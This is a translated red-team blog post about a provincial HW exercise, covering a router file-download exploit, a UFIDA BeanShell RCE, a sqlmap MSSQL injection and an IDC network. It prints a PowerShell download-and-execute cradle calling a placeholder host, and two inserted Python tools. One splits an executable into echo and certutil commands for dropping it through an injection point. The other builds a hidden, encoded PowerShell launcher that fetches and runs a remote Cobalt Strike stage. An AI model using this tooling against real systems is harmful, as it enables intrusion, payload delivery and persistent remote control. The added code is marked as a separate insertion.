SongShuA

A dream in the heart and fate in one's own hands: a cybersecurity practitioner full of ideas.

Notes from an HW (护网) exercise in a certain province and city

A while ago I worked a small engagement and ran into a few things worth noting down.


1. Router Security

While casting a wide net during information gathering, I found a router login page in the target network segment.


This router model is typically a home device and rarely seen in businesses, yet the segment is a commercial one with no residential users to speak of, so it was probably exposed by mistake. A search of the local vulnerability database turned up an arbitrary file download, which I used to pull the configuration file and recover the account and password.

After entering the console, I found that there is a tunnel proxy function.

After some fiddling I worked out how to use it: only the client side needs configuring. The server mode is for linking multiple routers of the same brand. IPsec can be turned on for encryption, but the tunnel also works without it.

In the end I managed to connect, though only intermittently, using PPTP from a Windows 7 client; Windows 11 and macOS would not connect properly (Kali had issues too). Once the tunnel is up you are effectively inside the target's internal network; the steps after that are not covered here...

2. UFIDA BeanShell (bsh)

1. BeanShell Exploitation

In the target segment, the enterprise's OA system turned out to be UFIDA (Yonyou), with a BeanShell RCE vulnerability.

At first, though, the default BeanShell page existed but no command I sent would execute. Reading up on the vulnerability, I learned that the same page is also reachable under other directories (modules), so I fuzzed the paths with a dictionary and picked the most usable hit to work from. Dictionary link

2. Unexpected Disconnection

Once I had a working bsh RCE page, I tried to pop a reverse shell. The shell was non-interactive, which limits many operations, and the environment on the box had various problems, so in the end the only option was to bring it online in CS via PowerShell. Here another problem appeared: each time I ran the CS-generated payload the server reported a successful connection, but after about 60 seconds the session dropped anyway.

Cobalt Strike's default Beacon sleep is 60 seconds; a session that does not check in again after that is treated as dead. So why would a perfectly good session die? The "carrier" executing our command is a web request, and a web request is not long-lived: once the page has finished loading, its work is done. The reverse shell is launched from that request, so when the request completes the process it spawned is torn down and the CS session goes with it. The 60-second sleep merely makes it look as if the session was alive for 60 seconds: Beacon checked in once and was gone before its next check-in.
The fix: still PowerShell, but with different logic. Switch to download-and-execute:

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://xxx.com/shell')"

Now the flow is: download first, then start a separate PowerShell to run the downloaded content.

When the web request ends, only the process that did the download is destroyed. The separately started process keeps running, and so does the CS session.

3. MSSQL Injection, Site/DB Separated, No Outbound Access

A feature of the target's WeChat official account had an MSSQL injection.

sqlmap exploited it and gave me an os-shell. But when I tried a reverse shell it turned out the host could not reach the internet, and DNS did not resolve either. I considered writing a webshell to proxy through for the rest of the work, but could not find the site directory anywhere on the system; presumably the web server and the database run on separate hosts, so that plan fell through.
Sqlmap os-shell tricks

1. For a directory with spaces, wrap the path in double quotes, e.g. cd "C:\Program Files". If dir lists a directory but cd says it does not exist, spaces in the path are the usual cause.

2. For a directory with Chinese characters, sqlmap may fail to cd into it because sqlmap and Windows cmd use different default encodings: sqlmap sends UTF-8 while the target's cmd uses GBK. You can intercept the request and re-encode it on the way out (too much hassle, though).

3. Writing a large amount of content through os-shell on Windows means the clipboard content is rendered character by character in your own terminal window, which is extremely slow and resource-hungry. I switched to a GUI "super injection" tool for the writes, which saves a lot of time and resources (it still lags, but far less than the terminal).

4. When writing files with echo and similar commands there is an 8K limit (cmd.exe's 8191-character command line): only about 8K can be written per command, and most tools on the market are subject to it.
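A small generator for that 8K limit, added here as an example (it is not a tool from the post or from the linked articles): it base64-encodes a payload, splits it into echo lines that each fit cmd.exe's 8191-character command line, and decodes the result on the target with certutil, which ships with Windows. The remote paths and the sample payload are constructed placeholders. If each line goes through another wrapper (xp_cmdshell, sqlmap's own payload), pass a smaller max_line to leave headroom.

```python
import base64

# cmd.exe refuses command lines longer than this; every echo we emit must fit.
CMD_MAX_LINE = 8191


def build_echo_commands(data: bytes, remote_b64_path: str,
                        max_line: int = CMD_MAX_LINE) -> list[str]:
    """Split base64(data) into 'echo <chunk> >><path>' lines, each <= max_line chars.

    The space before '>>' matters: a chunk ending in a digit followed directly
    by '>>' (e.g. 'echo ...2>>file') is parsed by cmd as a handle redirect.
    Base64 itself contains no characters cmd treats specially.
    """
    b64 = base64.b64encode(data).decode("ascii")
    overhead = len("echo ") + len(" >>") + len(remote_b64_path)
    chunk_len = max_line - overhead
    if chunk_len <= 0:
        raise ValueError("remote path leaves no room for payload data")
    return [f"echo {b64[i:i + chunk_len]} >>{remote_b64_path}"
            for i in range(0, len(b64), chunk_len)]


def build_decode_command(remote_b64_path: str, remote_out_path: str) -> str:
    """certutil base64-decodes a text file; -f overwrites an existing output."""
    return f"certutil -f -decode {remote_b64_path} {remote_out_path}"


def build_transfer_script(data: bytes, remote_b64_path: str, remote_out_path: str,
                          max_line: int = CMD_MAX_LINE) -> list[str]:
    """Full sequence to run one line at a time through os-shell / xp_cmdshell."""
    cmds = [f"type nul >{remote_b64_path}"]  # start from an empty file
    cmds += build_echo_commands(data, remote_b64_path, max_line)
    cmds.append(build_decode_command(remote_b64_path, remote_out_path))
    cmds.append(f"del /f /q {remote_b64_path}")  # leave only the decoded file
    return cmds


def simulate_target_file(cmds: list[str], remote_b64_path: str) -> bytes:
    """Replay the echo lines the way cmd would (echo emits the trailing space
    and a CRLF) and decode like certutil does, ignoring all whitespace.
    Used here to check the generated script offline."""
    suffix = f" >>{remote_b64_path}"
    text = ""
    for c in cmds:
        if c.startswith("echo ") and c.endswith(suffix):
            text += c[len("echo "):-len(suffix)] + " \r\n"
    return base64.b64decode("".join(text.split()))


if __name__ == "__main__":
    # Constructed sample payload; a real run would read an exe from disk.
    payload = bytes(range(256)) * 100
    b64_path, exe_path = r"C:\Windows\Temp\p.b64", r"C:\Windows\Temp\p.exe"
    for line in build_transfer_script(payload, b64_path, exe_path):
        print(line)
```

The 25,600-byte sample becomes five echo lines, the longest exactly 8,191 characters; a real executable needs proportionally more, which is why this is slow through an injection point.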

I had not run into this combination before (site and database separated, no outbound access), so I asked my friend @海鸥 i for advice, and he pointed me to his articles:

Exploring ways to land an exe on a site/DB-separated host with no outbound access - MSSQL

Exploring ways to land an exe on a site/DB-separated host with no outbound access - MySQL

A record of a no-echo, no-outbound, site/DB-separated target

The idea is to use one of those methods to drop something like fscan, redirect all of its output to a text file, and read that file back through the injection, repeating until you land on a host with outbound access. I settled on bcp for writing files, but because it goes through the database and I judged the operation both sensitive and time-consuming, I stopped pursuing this target.

4. PowerShell Encoding

On one target, running things through PowerShell failed whenever the command contained quotes, slashes and similar characters: the payload never arrived intact. So I wanted to base64-encode the command and let PowerShell decode it, which is how the CS PowerShell one-liner works. I encoded it with the first tool to hand, but the shell command still would not run. It turns out PowerShell's -EncodedCommand expects base64 of the UTF-16LE bytes of the script, not of its UTF-8 bytes, so the output of an ordinary base64 tool is not interchangeable. A conversion script from GitHub solved it.

Script Link
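An added example covering both this section and the download-and-execute fix from section 2 (it is not the author's script and not the one linked above): encode_command produces the UTF-16LE base64 that -EncodedCommand actually accepts, decode_command lets you check what a given string really runs, and build_launcher assembles the download-then-detach one-liner so that the text typed into the web shell contains no quotes at all. The URL is a placeholder and Start-Process is used here as the way to get the stage into a separate process.

```python
import base64


def encode_command(script: str) -> str:
    """Base64 of the UTF-16LE bytes of the script: the form -EncodedCommand expects.
    Base64 of the UTF-8 bytes (what generic tools emit) is read by PowerShell two
    bytes per character and comes out as garbage, so the command never runs."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(b64: str) -> str:
    """Inverse, for inspecting an -EncodedCommand string before running it."""
    return base64.b64decode(b64).decode("utf-16-le")


def build_launcher(url: str) -> str:
    """One line to type into a non-interactive web shell (URL is a placeholder).

    The web request's PowerShell only starts a second, hidden PowerShell and
    exits; that child does the download and runs the stage in memory. When the
    request finishes and its process is torn down, the child is not waited on
    and keeps running, so the CS session stays alive.
    """
    inner = f"IEX (New-Object Net.WebClient).DownloadString('{url}')"
    outer = ("Start-Process powershell -WindowStyle Hidden "
             f"-ArgumentList '-nop -EncodedCommand {encode_command(inner)}'")
    # Only the outer layer is visible to the web shell: letters, spaces,
    # hyphens and base64, no quotes to be mangled on the way in.
    return f"powershell -nop -w hidden -EncodedCommand {encode_command(outer)}"


if __name__ == "__main__":
    print(encode_command("ls"))           # bABzAA== ; UTF-8 base64 would be bHM=
    print(build_launcher("http://xxx.com/shell"))
```

Base64 still contains `+` and `/`, which cannot be avoided since -EncodedCommand takes standard base64; if a path on the way in mangles slashes, the outer layer would have to be URL-encoded as well.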

5. Target Virtual Machine and Network Architecture

In the target segment there was an IDC (hosting provider) homepage. After taking over the official website I found that the machine had no internal IP at all, and its gateway was a public IP as well. Ping sweeps of the 172 and 192 ranges found no live hosts; after switching to scanning without ping detection I found a few 192 hosts, but with only ports 25/110 open, which is very odd.

Other people suggested it was a virtual machine, so I widened the internal scan and found several 10.x segments, but every live host was a router. Going deeper would probably mean a VM escape, which is too hard and too slow to be worth it.

Back in the website code, the configuration file held the accounts, passwords and IPs of the database server, the Redis server and the "ROS server", but the database and Redis have access whitelists that only the ROS server is on. I did not know what a ROS server was; a Baidu search showed it is a MikroTik RouterOS router, and I found a client tool for it: link


Connected, it looks like this, and there was not much of value. Summary: if you have plenty of time, set an IDC architecture like this aside and come back to it later.
